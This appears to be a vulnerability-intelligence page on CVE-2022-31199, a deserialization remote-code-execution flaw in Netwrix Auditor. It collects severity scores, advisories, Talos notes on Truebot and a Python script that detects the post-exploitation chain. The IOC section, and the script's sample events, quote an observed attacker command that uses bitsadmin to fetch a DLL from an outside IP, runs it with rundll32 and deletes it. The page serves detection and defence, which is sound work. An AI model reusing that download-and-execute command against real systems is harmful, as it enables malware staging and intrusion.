CVE-2022-31199
Published 2022-11-08
Priority P1 · 98 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2023-08-01
Exploited in the wild
EPSS 36.15% (percentile 98.3)
Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents installed on monitored systems. The remote code execution vulnerabilities exist within the underlying protocol used by the component, and potentially allow an unauthenticated remote attacker to execute arbitrary code as the NT AUTHORITY\SYSTEM user on affected systems, including on systems Netwrix Auditor monitors.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netwrix | auditor | < 10.5 | 10.5 |
Detection & IOCs
Observed command line (post-exploitation Truebot staging, URL defanged):
C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll
- Monitor UAVRServer.exe for spawning cmd.exe or bitsadmin child processes; this indicates exploitation of CVE-2022-31199 and subsequent Truebot payload staging.
- Alert on bitsadmin transfers initiated by UAVRServer.exe that drop DLLs into C:\ProgramData\ followed by rundll32 execution, the observed post-exploitation pattern for this CVE.
- Block or alert on inbound connections to TCP port 9004 from untrusted sources; this is the vulnerable .NET remoting service port exploited by CVE-2022-31199.
- The vulnerable .NET remoting service (port 9004/TCP) is typically not internet-exposed; exploitation most likely comes from an attacker already on the internal network, or where the Netwrix server is directly internet-facing with no firewall.
- Exploitation grants NT AUTHORITY\SYSTEM privileges and, because Netwrix Auditor typically runs with extensive AD privileges, successful exploitation likely leads to full Active Directory domain compromise.
- The vulnerability is an insecure .NET object deserialization issue via an unsecured .NET remoting service; arbitrary objects can be submitted to achieve RCE.
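The three process-level indicators above, turned into detection logic and run over constructed sample events. This is an added example, not code from the page's sources or from Netwrix: the event field names, the UAVRServer.exe install path and the sample records are assumptions, and the command lines are the observed chain quoted above with the URL left defanged. It walks the parent chain rather than checking only the direct parent, because in the observed chain bitsadmin and rundll32 are grandchildren of UAVRServer.exe via cmd.exe.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style; field names and the install
# path of UAVRServer.exe are this example's assumptions, not a real schema).
# List order stands in for time order. The command lines reproduce the
# post-exploitation chain quoted in the IOC section, URL kept defanged.
UAVR = r"C:\Program Files\Netwrix Auditor\UAVRServer.exe"  # assumed path
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 800, "image": UAVR,
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "UAVRServer.exe"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe", "parent_image": UAVR,
     "cmdline": r"C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP "
                r"hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll"
                r"&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll"},
    {"pid": 1310, "ppid": 1300, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll "
                r"c:\ProgramData\msruntime.dll"},
    {"pid": 1320, "ppid": 1300, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"rundll32 /S c:\ProgramData\msruntime.dll,fff"},
    # Benign noise: an interactive shell and a BITS transfer into a user profile.
    {"pid": 2000, "ppid": 1900, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
    {"pid": 2100, "ppid": 1900, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"bitsadmin /transfer job https://example.com/a.txt C:\Users\alice\a.txt"},
]

# Children the video-recording service has no business spawning.
SUSPICIOUS_CHILDREN = {"cmd.exe", "bitsadmin.exe"}
# A DLL path under C:\ProgramData\ as it appears in a command line (case-insensitive;
# stops at whitespace, '&' and quotes so the ",fff" export suffix is not swallowed).
PROGRAMDATA_DLL = re.compile(r'c:\\programdata\\[^\s&"]+\.dll', re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestor_images(event, by_pid, max_depth=16):
    """Image names up the parent chain, nearest first. Starts from the logged
    parent_image so the rule still fires when the parent's own event was missed,
    and stops on cycles or pid reuse."""
    names = [basename(event["parent_image"])]
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen and len(names) < max_depth:
        seen.add(cur["pid"])
        names.append(basename(cur["parent_image"]))
        cur = by_pid.get(cur["ppid"])
    return names


def detect(events):
    """Return (rule, pid, detail) findings for the three IOC patterns above."""
    by_pid = {e["pid"]: e for e in events}
    dropped = {}  # lower-cased DLL path written by bitsadmin -> pid of that bitsadmin
    findings = []
    for e in events:
        img = basename(e["image"])
        parent = basename(e["parent_image"])
        lineage = ancestor_images(e, by_pid)
        # Rule 1: UAVRServer.exe directly spawning cmd.exe or bitsadmin.
        if parent == "uavrserver.exe" and img in SUSPICIOUS_CHILDREN:
            findings.append(("uavr-spawns-shell", e["pid"], f"{parent} -> {img}"))
        # Rule 2: a BITS transfer landing a DLL in C:\ProgramData\ anywhere below
        # UAVRServer.exe in the process tree (a grandchild via cmd.exe here).
        if img == "bitsadmin.exe" and "/transfer" in e["cmdline"].lower():
            m = PROGRAMDATA_DLL.search(e["cmdline"])
            if m:
                dropped[m.group(0).lower()] = e["pid"]
                if "uavrserver.exe" in lineage:
                    findings.append(("uavr-bitsadmin-drops-dll", e["pid"], m.group(0)))
        # Rule 3: rundll32 loading a DLL that an earlier bitsadmin transfer staged.
        if img == "rundll32.exe":
            m = PROGRAMDATA_DLL.search(e["cmdline"])
            if m and m.group(0).lower() in dropped:
                findings.append(("staged-dll-executed", e["pid"],
                                 f"{m.group(0)} staged by pid {dropped[m.group(0).lower()]}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:26} pid={pid} {detail}")
```

Run stand-alone it reports the three findings for pids 1300, 1310 and 1320 and nothing for the benign events. Against real telemetry, feed process-creation events in time order: rule 3 only fires if the bitsadmin event that staged the DLL was seen first, and the defanged `hxxp`/`[.]` form of the URL plays no part in matching, so the same logic works on live command lines.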
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | 9.8 | CRITICAL | |
| cisa | 9.8 | CRITICAL | |
GHSA
GHSA-c3rc-wfgg-r544 · ghsa_unreviewed · 2022-11-08 · CRITICAL · CWE-502
Description: identical to the NVD description above (remote code execution in the Netwrix Auditor User Activity Video Recording component, as NT AUTHORITY\SYSTEM, on the Netwrix Auditor server and on agents installed on monitored systems).
VulnCheck
Netwrix Auditor Insecure Object Deserialization Vulnerability · vulncheck · 2022 · CVSS 9.8 · CRITICAL · CWE-502
Netwrix Auditor User Activity Video Recording component contains an insecure object deserialization vulnerability that allows an unauthenticated, remote attacker to execute code as the NT AUTHORITY\SYSTEM user. Successful exploitation requires that the attacker is able to reach port 9004/TCP, which is commonly blocked by standard enterprise firewalling.
Affected: Netwrix Auditor
Required Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/; https://heimdalsecurity.com/blog/clop-ransomware-uses-viral-truebot-malware-to-access-n
CISA
Netwrix Auditor Insecure Object Deserialization Vulnerability · cisa · 2023-07-11 · CVSS 9.8 · CRITICAL · CWE-502
Affected: Netwrix Auditor
Netwrix Auditor User Activity Video Recording component contains an insecure object deserialization vulnerability that allows an unauthenticated, remote attacker to execute code as the NT AUTHORITY\SYSTEM user. Successful exploitation requires that the attacker is able to reach port 9004/TCP, which is commonly blocked by standard enterprise firewalling.
Required Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.
Notes: Patch application requires login to the customer portal: https://security.netwrix.com/Account/SignIn?ReturnUrl=%2FAdvisories%2FADV-2022-003; https://nvd.nist.gov/vuln/detail/CVE-2022-31199
Remediation Due Date: 202
No detection rules found.
No public exploits indexed.
Talos
Breaking the silence - Recent Truebot activity · blogs_talos · 2022-12-08
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot was first identified in 2017 and researchers have linked it to a threat actor called Silence Group that is responsible for several high-impact attacks on financial institutions in several countries around the world.
There are claims by other researchers that this group is associated with the well-known threat actor TA505 (aka Evil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.
Recently, the attackers have shifted from using malicious emails as their primary delivery method to other techniques. In August, we saw a small numbe
Timeline
- 2022-11-08: Published
- 2023-07-11: Added to CISA KEV
- Exploited in the wild